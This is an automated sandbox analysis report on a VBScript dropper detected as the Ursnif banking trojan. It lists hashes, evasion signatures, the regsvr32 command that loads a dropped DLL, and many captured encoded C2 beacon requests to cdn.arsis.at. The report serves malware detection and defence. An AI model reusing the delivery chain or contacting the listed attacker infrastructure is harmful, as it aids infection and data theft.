Loading ...

Play interactive tourEdit tour

Analysis Report presentation#_37412.vbs

Overview

General Information

Sample Name:presentation#_37412.vbs
MD5:570cab3ed56a9c69bc3e5b85a838b42d
SHA1:c2952cbb31ee98c5c1a676e1820a3c73345083a0
SHA256:3a34c90fa6f4c879311dee500a97fb07aa8f62e338d6d4c539132d1d0234079e

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 3324 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation#_37412.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 1168 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\afterbirth.rs MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 1096 cmdline: -s C:\Users\user\AppData\Local\Temp\afterbirth.rs MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 3436 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4568 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3436 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 1668 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 3724 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1668 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3236 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2332 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3236 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3868 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2656 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3868 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview


            System Summary:

            barindex
            Sigma detected: Regsvr32 AnomalyShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: -s C:\Users\user\AppData\Local\Temp\afterbirth.rs, CommandLine: -s C:\Users\user\AppData\Local\Temp\afterbirth.rs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\afterbirth.rs, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1168, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\afterbirth.rs, ProcessId: 1096

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: cdn.arsis.atVirustotal: Detection: 10%Perma Link
            Source: http://cdn.arsis.at:80Virustotal: Detection: 10%Perma Link
            Source: http://cdn.arsis.at/Virustotal: Detection: 10%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\afterbirth.rsVirustotal: Detection: 47%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\afterbirth.rsReversingLabs: Detection: 29%
            Multi AV Scanner detection for submitted fileShow sources
            Source: presentation#_37412.vbsVirustotal: Detection: 31%Perma Link
            Source: presentation#_37412.vbsReversingLabs: Detection: 23%

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0118258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,5_2_0118258E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_73701E40 FindFirstFileExA,5_2_73701E40
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: Joe Sandbox ViewIP Address: 47.91.16.227 47.91.16.227
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /api1/U9X_2FV7skQVXG/AkibNGmVcWeLOUu1NV2vR/znU9uFLGumsMqOtC/VdGFNi5gBPjslAM/rWOr8EW_2BkvCPK1Hw/p672PK1XD/aCGYZfmE1q_2B6jezsYA/OM9ZLl_2BVu8w_2BTa3/3dpNUTZcLuLVCPEatVfaTL/jsEf7fsIUvVTX/7DW55a_2/BC4Ihtx3ynaQjizPZBNALgB/coZVHKLuu_/2Bks4B2iRpAFd1HHw/oq8UE97h623t/OlLFG6ZOT_2/BJHA7pijakYhSB/289aru_0A_0Dq1BQViLhr/hSUyS99lYkHGIAcC/hdBywOIGygqdGV0/k_2BPWHst5oL1tJlTu/WflE7HAYUT_/2FY HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/nbRK2bOJqNjMQUn7cAc/ZtXYBikVEBXtiMHu43F11z/Hes96tl0nIGsN/I29TXIEJ/NG22gXxi5ad64_2Bb7AbWi6/E10eWBjriy/r3KN8ij9tt6lwulPY/U90OieOShLtn/cNYlb8YGZbB/FZkmdAPAztWeDj/6YE4BUwiDFTViOyZAwXFo/XUVOCOEsfjU6UshZ/6d1L_2FvwAUzyXJ/kK5UrgWah_2B7aJ_2F/6OfHgFnB9/yl41_2FlUkqN1VwewA_2/BLLIdF9duXNdLsy_2F_/0A_0DFwEmBetd8KjHZkKVT/FCDbeMArToL9v/iNMyjJzS/k0t8RawFbTCRFwbzFHegLNQ/0A6DnmN HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/gOZMU9g3v951UKb7VFZ/_2B9w6D2_2BAKjKwj1OMKB/LmOUki6WnUfaj/qDANQy75/yiUGsEjezb5tCJWMSO0mW1L/brqa34Abmn/787vJq3XJSZ_2Fgse/6OtFr4YRp8Vk/pYPcEgtHP7k/jzE4uDew8Yxz2a/Q_2FnhDufgpAYh4iUdWb3/IisyxGACqWtkYOOz/zQGHX964RUk2e8A/kCCDAw8NlHMiu3RJFE/fmntpLMOZ/rbdv4YBCI9ljFv4QDv6J/b1oY5_2FkU2CRS_0A_0/DUEUyWKmwF_2FmEVGT5N26/KlkiDqfzJVKs3/VGFuLmj7/D0sHDwUolgKmZhQeCMz8tcK/HZIwE HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/lD_2Bd1CLnsH/VjlnBWVgLOE/Vyj3UiLo4GSNVk/cO6WkeUtwmyGWPXFOCZmU/Bm_2BljpkNi8zbmZ/CHAaUDg_2BrTUJG/rWNwl2PdMlRsj27z8m/xw9TO8IVv/esennqHJKtQEbbXk9mgv/htN_2BUNyBiOeycktmc/4YdpU4qj2gZSXzv4v7bXpr/8jkiWQRXuwnr5/IURoqh5g/SvoqsiF_2F5x6rzrDl35xvQ/9uNqcTwlDy/R5oPqnbCwYLdH2Nnx/V7n65lhXuHsg/mf_0A_0Dyaj/_2BzSdzjAHG0pE/1UC9Ql0Q8JCTYvj29DTIY/hkl5yddUOl7i3mlm/WU8sK11QhPKmtm5/0 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/lwuPdaPTuR8eBoC4/vShoRm2q4eT6Z_2/FektbbX6qERojD5NoC/2mLIdLmoY/oe6KE72ImARbZ5oCqbs6/Lwf_2BO_2BClBMiqgVk/pAkfbSOeJOtBvl6q4oBZar/oTeemGXcYXXbV/gQCork8K/PGwwbCLbwwBrx4MGLhetRqf/awAA9AORwN/NwalqmVsuGtIFrf43/4iu0JhYu4Ypb/uPS1r_2F8fS/kqoc1brRdsTl0d/Jkj7x2MVaN4ElQ8mXyfRH/Fk3sg85NGYC_2F_0/A_0Du5xjKeRBQix/F7HPUi34CmIGAWeN3E/adxdxfc7q/PmeVTflERZvWbwtC5T6q/eDpD6tQpU_2/F HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/Ft1630LIH4MZNqLaG/NuvcmQUYVZDN/wGyYDI1anow/AwzQW3Ks5CQaJg/qXaGjbduv13M7zvCslt2v/D5yCkEAGu7miu5WI/wTCt6TWzEVAgfIa/d_2Flv0VmOZkfjqS5M/lN7VnTWVT/otfLD5atZcZ1oQ3e3h18/nRBYNH6zQ7lnhwgD0fj/_2FMUKt7PKfxyc0zxPhonu/RfUlClaMmahwz/BcY7ygOT/GSJ4m0cvcQ3eDBWTlvtKdUY/GztollkTlu/xqkzJ5MN_0A_0D9Tl/uOEhKzL9Jv6Y/RsRE6xpHwyO/oJTkc46T73KOMK/ntTns4D0PcaWfIQanhJWu/WbpNBcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/hpOzlRBOkEC27Z0j_2F/yPpp5RyE9Oknv8tQCuASeH/trIy518RQtUv_/2Bm4JbFO/Rd35PF8E_2BWJyarEkvJlGa/lZL54pQ54j/QZFODazB2QCAOLXB0/wHoTsdAiWgRN/OluocqECOtt/ZbnhLve1rfqoNr/jV7Q79rdBwNCaZ3hB_2Fb/roZVpNC1B2SznOYx/dHXThx7R2sqqnZ8/bhxPKGANJu_2FLnQSi/VJ_2FY5d5/Sews2_2F6yRUrb0Mu8PG/13GffX9JVAzUBzzIvh_/0A_0DZvtFvkB4xw_2FjCSi/DPo6Ifhj2A_2B/bOLQPSTa/j_2FrTCDcZjhGJquAdZrL1B/nuOmQfMEA/2t5J HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/Khi8SzUqGScVMrQK_2Fslt/YcubLI_2BV6FG/4vHBny_2/FGClhdu4iicvamBa4WU_2FX/M7RDRe3yfN/4Hpd8KTp_2FSKCbui/BeUPWJnqSuGf/RIDfmKqgvH3/rfYjbrMMBg0aJI/8h5qeEqEGoRS_2BOgndJx/3cw1dNqlaclTf1uH/y9R1HTalKIM2ReY/vu1QvjvnsHs57_2B_2/BGIxx0LBG/XG1_2B5WXkayEfLV2NW5/fPy7kLr31a09IpR6doq/Yo4ZFhAJ_2BhebGK0cMpth/2s_0A_0DH859g/XzvlzFCy/BXozBz6IlKDDewkpZyXE70C/ff1_2BHl6F/o9TI2CRnyF56_2BSV/_2BdXgS1/qb_2F HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/63cqJkXTc/Vqe7Q4brl_2BNBYghoAM/IbjbSbZ6OWFPWJU4eFk/i9OzLjrRPsZ04QFQbQC_2B/VOH4giw7_2FIB/U_2BWvsv/rMyW7evM1w55vvWRMX3cwGE/wH_2FP4AhB/oDrgV_2BAYF5UwC9o/pNhqnE594wSn/h29QE1nKzuS/9dxRDzEM6oqEHL/Edv79y1a5qKbX_2BHBK5t/1xoUQNIBu6BNtcgr/Q5BTpGBCNQ4I20o/f2alh1sl1TT6UWcyQA/XbCgqPT63/V7sIPYe5v_0A_0DOt8Nq/Y419LLPihxkcLdWx4mK/Kfz13ZE0iujvASTsRg4RXt/hcEPixmDSi97C/vLug1nqG/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/DJ2eFEKZq8U1lqR/jnLxdpvy51PH6egcCU/PxGNe1PTx/6VSQ7fd_2FKiMlsO5XFz/sDQpWNzmvSOXCBwOVci/JozPfEoiJZL81KVz1hDGRP/HammlNeHI2XYb/hHexYQzI/z1psBiJLOalRoGOut2uqiGq/0tlTGCv4_2/B9GF0Ada_2B_2FaRp/JcsDMVRYhPf0/7qhLk0u_2Bg/NQFMvbqMOZ_2Bs/4Y7IX8fV_2BHcDyBZC46y/prmx2JwgmRaejQE7/s3FKt4XQ5F_2FCz/Nbcd4_0A_0DIiy9nzR/mAp_2Bh6J/NKiiIO87y0UziJaoICT_/2BY9inU5TN/QJXKg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/a3Vz07VeYPvSm2/makrV6Z_2FwJ_2BIp8pbG/Gk_2F71mamvk2cUZ/U_2BmhZnqbukpAP/YBE0TnXsyPDIlbY6_2/FYoXPRH0W/cl4YQu9T_2BBRolZjMXY/M9K_2BITMg4dfeSouoP/hUAYILmmHjn8zIm2OtrhIW/Mf5xmcy_2BqSu/9ZXKNIqJ/a3ZwSGhiFmWpGGiA9xjlf32/jYzhTtkWJw/pChLaVv1xmU8LCF4q/PqOChztYs4ys/s1YdlKNM2LB/UdOL92byLyPoHg/dR3PgA_0A_0DlDqkRAzu0/kFKtDiOwrbPjI_2B/vFJbPGQ0z_2F92C/tTG_2Fm1_2BqUecDRm/Vg7KTeFJGon/K2kEPT7 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/HZN0oiBpETLMs1/04ZwqrTlF2fiYUjJgUB7b/aXddKpKd7SogQKI0/f9Kg1_2FaZA46nk/y24wBEGgEi7NvMfjLR/qfruiYvqu/wzutQZmOJ5VmT5OtZ59L/3maw6gKsYG7mQrZ_2B_/2BLrETmBjINlDIrIEWtz5D/jrE3_2B2IxSra/UNLbEbPg/jH_2BS1vY9jS54wXf4X71E_/2FWA_2Btlj/6saXXVg6FXfWWn_2B/_2FSFc5XpLvC/OH6_2BeTgrU/7aW3OBqA_2FiK0/II_2BTb4wSzcQF_0A_0DS/YMSEW_2BL1mh4IYE/fRuPxVI3HpaOmPr/jKUee_2FnrnRs_2Fhp/MpYyYMGC4/NE_2BV0uAe/oo_2BB7F/m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/pMBjT60J3QzW/2S7BpnCRJGv/_2BCJz1WD6LvVO/UYuC86ONCTcRMSPsRQ1V5/rn4oIkAX1j9ku4Ic/6RNNHFMPvjOgaTW/jcZn9Xy_2FLbGWT6Lj/32ZdOLaPv/fF1YakoLw0tPZOk4hgRu/nTgvxPFfZttAEJw86qL/rUsupYU0eijPkF70W85vb7/KRpuo9Si778kF/EnFkYILo/_2BrwQKTdMtgGhR5m9UrXjX/b0Xr9D04_2/B3aPh52hOGGuAY6Hv/txqbcnL5sO_2/BG_0A_0D8pi/ILZ9Kw11dehFDv/mQwggGFnYf_2FpvIAotwU/Wkz1mkL1J/BX HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/nJP22pCdr/onbL4xTCAKdpOCZd67XZ/zeOWNEBCaVEDnuXDqyy/gKOpKX5US0b_2F8AZso0n8/iG20JBDG0sJ8v/qtmVdrih/AJNlZVV7oVPLLsnljuzkLLx/rsX_2BLJDZ/FqJfc6scmj61_2FpE/XUbFsru364Kc/JGYks_2B9P7/T3vnqWm2Z8yi21/Vq3rVRJMevwYXV6yj14UP/gPoKjZtxxcD08d0H/tUFdxtCLsQ2pdbK/JDmBM7N_2BObt1xnhK/wQIk8S_2F/csqbtIt_0A_0DGvYmTY_/2BRANjpi6Pto0V4GEDN/_2FgjuRjT81NNO76_2FsHD/mSIZ_2FFOwEfn/SZ7d6OAOu7Tf/9ky HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/pdyEn910Mk_2/FlHr99fDD7T/WHdO77PE1muwJ0/8kfHrIZPdGcT4oog1UBSr/AqzVHXjqi4NvFUfS/_2FlNckthmqu48M/L1AF8KXZamHkA2WPyz/AfyRwDoSo/HWUTLCevnIv3wkjNbvm2/aTDoXysABYr1kv9NWHn/bsal5lrXO2csgC9Wz4j2dq/0o3mmqezVaf1y/bRZr4G48/Y1jkZLcrccXgO3783qN22Fi/lkg0jO4neS/YVfREVCSaXcybZYYr/J_2FzmcPYd_0/A_0Dldu9Dz6/_2FhI1zb6jZcU0/XD1vw_2FUlh8V_2B_2F5q/iwCMO7McPeEUhYyt/uSXuIYI8jVh0gezuM/3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/K_2Fwx7y/hHrkFzZv_2F6ZhYlYVIr_2F/QjmQ_2BXN_/2FY0tw7yPFNXVzSRk/vXMPRx_2FiTP/KAYs03yXUSA/78_2BIvac3M9xf/gOKMMBfisKfKGT2wqZS_2/FVFiBIbNv59rEeD0/FwXavbpomflq0j2/5PzKOyQJirSIUOxfki/D97_2BiTS/gwNK0KkvrmNO28sHZG2c/9MhMC5SFUkAEP7Var1N/a7UOKt_2BFgcgff8LX4kV1/ktl33OnliAPCj/NVja5NFX/waxycTcBRhl2Hs10_0A_0Dw/Xd75Dsh7PT/dEUZxmF5QYn7fPm_2/BBgzUldgHjIk/nRwtHVVsY3E/9tz7n_2FU_2Fvc/YtBqefcT/9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/TYj_2FO_2/BU8kshK5XeYQxND6w_2B/jLmQETo2668oAj2dmC9/YBPu9aAHCztoZXswZm0lBg/6L0AcOv6ShQ1r/KQ_2FaMs/jAuvF60FcQLA0upbnzCKnUJ/uYvbVKw0EZ/zh6sG0_2BvpTyBI7N/7YDth10NGL94/Ix9EjzqcOnN/WjboP74x1QSNuW/nIscXMzwjEDA7aylrmhSP/fQJ6XwJ_2F5syT_2/Bf_2BEvqm1fp_2F/Re9ocgG0M0KpMnCyT2/51mXqEItE/B6GbtR0DGDea8_0A_0Db/8Qa3J93z4jdlAqFxOlB/Tlvh5REuutwiOSmzA3u62M/xmDuF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/VUc8DYHbTd/nxhSvhN_2BaqluyCR/yfgw0tuiJI_2/BCBTjHmGW3W/UUBVj78yPgrw9z/2II2J1xpmC2jKwN3VMLH9/dPcEEhMC8_2BCxlF/7yvak32zcPZ7k2m/r0rk6OI5JReyQNm4qG/mx_2FY0uR/ssA7XZT_2BoEKxtgu_2F/Oy7Yft7YLCE6b8nGcgb/XcLF7H27oeXcXM_2B4kEEE/wihvMhHWVFZG3/Snnx76Rk/ip5e4FBAKzJV8Q_2FSyoAQz/MzXU3AXLf2/Isj3Iu4CRA_0A_0DK/rAkzYBSa3DMr/CgyShC9pavL/t4AoiHS6_2Fuab/2SQtfvJXM0yAFEV86nQ9S/kivRx_2BN1/abi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/oa2e_2BE33qN2CXW/pY3NQ0ERzVODRWs/mGF_2Bh_2FQ8UAs_2B/dmXEgMeDj/YIhhtR2FvaZsUL3hOh_2/F9gWoPWZi_2BKGuhmmK/UZyMbPPlcIpP4h9xnOL5A9/dOffJOgAKeiUv/So9BVJ23/pBVhy8v09DF0CAOeWccfBNg/I04n28JWOK/lDoXMsxO99GdTZjiK/R99L_2FqOKh7/j9NrpG92p7c/jWuh8HwdOW_2BY/qaSomOqpO4PCQ36wrWavs/LVqbzBn7UVT8mj9y/Qa7x_0A_0DQjC5s/eD_2BR_2FbkcuXQOaq/nRCzegTmz/jxPru1C5I9itjaIZWVvm/_2BuKoEohQ8/U3PGCWc7j/gf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: msapplication.xml0.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x167ead9a,0x01d64c07</date><accdate>0x167ead9a,0x01d64c07</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x167ead9a,0x01d64c07</date><accdate>0x167ead9a,0x01d64c07</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x16888348,0x01d64c07</date><accdate>0x16888348,0x01d64c07</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x16888348,0x01d64c07</date><accdate>0x16888348,0x01d64c07</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
